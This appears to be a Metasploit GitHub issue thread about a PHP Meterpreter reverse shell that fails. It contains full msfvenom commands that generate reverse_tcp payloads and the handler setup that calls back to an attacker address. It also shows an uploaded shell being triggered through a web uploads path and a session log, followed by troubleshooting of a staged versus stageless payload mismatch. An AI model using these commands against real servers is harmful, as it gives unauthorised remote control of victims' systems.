Metasploit-framework: PHP Reverse Shell is not working

Created on 14 Sep 2017 · 8 Comments · Source: rapid7/metasploit-framework

shell5.TXT

Steps to reproduce

How'd you do it?

  1. First, creating the backdoor with msfvenom outside of metasploit
root@5433584:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=10.14.11.92 LPORT=4449 -f raw > shell5.PHP
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30067 bytes
  2. Starting the listener
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.14.11.92
lhost => 10.14.11.92
msf exploit(handler) > set lport 4449
lport => 4449
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.14.11.92      yes       The listen address
   LPORT  4449             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.14.11.92:4449
netstat -an |grep 444 shows:

root@5433584:~# netstat -an |grep 444
tcp        0      0 10.14.11.92:4449        0.0.0.0:*               LISTEN

Therefore, everything is fine.

Calling the PHP script directly in Browser to trigger:
http://10.14.11.150/admin/uploads/shell5.PHP

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

Expected behavior

Shell should come up

Current behavior

Error message comes up
Parse error: syntax error, unexpected '[' in /var/www/admin/uploads/shell5.PHP on line 1

I've looked at the source of the shell and saw this:
/*/ if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); } if (!isset($GLOBALS['channel_process_map'])) { $GLOBALS['channel_process_map'] = array(); } if (!isset($GLOBALS['resource_type_map'])) { $GLOBALS['resource_type_map'] = array(); } if (!isset($GLOBALS['udp_host_map'])) { $GLOBALS['udp_host_map'] = array(); } if (!isset($GLOBALS[

Question:
this should be without the /* comment, right?
Even when removing it, behavior is the same. the

Source is attached as txt-file.

System stuff

Metasploit version

Framework: 4.16.6-dev
Console : 4.16.6-dev

I installed Metasploit with:

  • [X ] Kali package via apt
  • [ ] Omnibus installer (nightly)
  • [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
  • [ ] Source install (please specify ruby version)

OS

Linux 54784584 4.12.0-kali1-amd64 #1 SMP Debian 4.12.6-1kali1 (2017-08-18) x86_64 GNU/Linux

Thanks for checking

bug payload

Most helpful comment

wrong payload (php/meterpreter/reverse_tcp), set (php/meterpreter_reverse_tcp)

All 8 comments

Nicely explained

The comment shouldn't matter, and there is no need to close the opening <?php, the issue is elsewhere :/

Hello @DontFuckItUp, I believe the issue is because you used the payload php/meterpreter_reverse_tcp with msfvenom (unstaged payload), but specified the staged version php/meterpreter/reverse_tcp in msfconsole.

Notice that one has a _ between meterpreter and reverse while the other has a /…

Could you try and use the same version in both msfvenom and msfconsole (e.g. php/meterpreter/reverse_tcp in both cases)?
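
The mismatch described in the comment above, as an added example that is not part of the original thread or of Metasploit's code: a Ruby check that reads the payload from an msfvenom command line and from a handler transcript and reports when one is staged and the other stageless. The split rule and the helper names (`classify_payload`, `check_pair`) are assumptions made for this illustration; the sample input is the pair of commands from the original report.

```ruby
# Added example: lint a lab transcript for a staged/stageless payload mismatch.
# The name-splitting rule is a heuristic assumption, not Metasploit's own logic.
STAGE_NAMES = %w[meterpreter shell].freeze # stage names this sketch knows about

# "php/meterpreter/reverse_tcp" -> staged    (stage and stager are separate path parts)
# "php/meterpreter_reverse_tcp" -> stageless (stage and transport joined by "_")
def classify_payload(name)
  parts = name.strip.split('/')
  last = parts.last.to_s
  if parts.length >= 3 && STAGE_NAMES.include?(parts[-2])
    { prefix: parts[0..-3].join('/'), stage: parts[-2], transport: last, kind: :staged }
  elsif (stage = STAGE_NAMES.find { |s| last.start_with?("#{s}_") })
    { prefix: parts[0..-2].join('/'), stage: stage,
      transport: last.delete_prefix("#{stage}_"), kind: :stageless }
  else
    { prefix: parts[0..-2].join('/'), stage: nil, transport: last, kind: :other }
  end
end

# Payload named on an msfvenom command line (-p or --payload).
def venom_payload(text)
  text[/msfvenom\b.*?\s(?:-p|--payload)\s+(\S+)/, 1]
end

# Last payload set in an msfconsole transcript.
def handler_payload(text)
  text.scan(/set\s+payload\s+(\S+)/i).flatten.last
end

def check_pair(venom_text, console_text)
  gen = venom_payload(venom_text)
  lis = handler_payload(console_text)
  return { status: :incomplete, generated: gen, handler: lis } if gen.nil? || lis.nil?
  return { status: :match, generated: gen, handler: lis } if gen == lis

  g = classify_payload(gen)
  h = classify_payload(lis)
  same_family = %i[prefix stage transport].all? { |k| g[k] == h[k] }
  status = same_family && g[:kind] != h[:kind] ? :staged_stageless_mismatch : :different_payload
  { status: status, generated: gen, handler: lis, generated_kind: g[:kind], handler_kind: h[:kind] }
end

# Sample input: the two commands from the original report on this page.
VENOM_LINE = 'msfvenom -p php/meterpreter_reverse_tcp LHOST=10.14.11.92 LPORT=4449 -f raw'
CONSOLE_LINES = "msf > use multi/handler\nmsf exploit(handler) > set payload php/meterpreter/reverse_tcp\n"

p check_pair(VENOM_LINE, CONSOLE_LINES)
```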

Hello,
I tested your recommendation with no luck. To be more detailed: I followed your directions:
Could you try and use the same version in both msfvenom and msfconsole (e.g. php/meterpreter/reverse_tcp in both cases)?

and as a result, the session dies.
My full log:

root@klappse:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.14.11.92 LPORT=4449 -f raw > shell6.PHP
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1112 bytes

root@klappse:~# msfconsole


  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


       =[ metasploit v4.16.9-dev                          ]
+ -- --=[ 1687 exploits - 966 auxiliary - 299 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set LHOST 10.14.11.92
LHOST => 10.14.11.92
msf exploit(handler) > set LPORT 4449
LPORT => 4449
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.14.11.92      yes       The listen address
   LPORT  4449             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.14.11.92:4449
msf exploit(handler) > [*] Sending stage (37514 bytes) to 10.14.11.91
[*] Meterpreter session 1 opened (10.14.11.92:4449 -> 10.14.11.91:45139) at 2017-10-09 12:44:22 +0200
[*] 10.14.11.91 - Meterpreter session 1 closed.  Reason: Died

I might be having a similar issue if not the same one!

I'm seeing similar in v4.16.13-dev. Tcpdump shows syn packets on attacker machine with no response. Is in ctf environment so cannot get files.

@wvu-r7 seems there wasn't a stable connection/something blocking it so it's probably not a valid bug.

wrong payload (php/meterpreter/reverse_tcp), set (php/meterpreter_reverse_tcp)
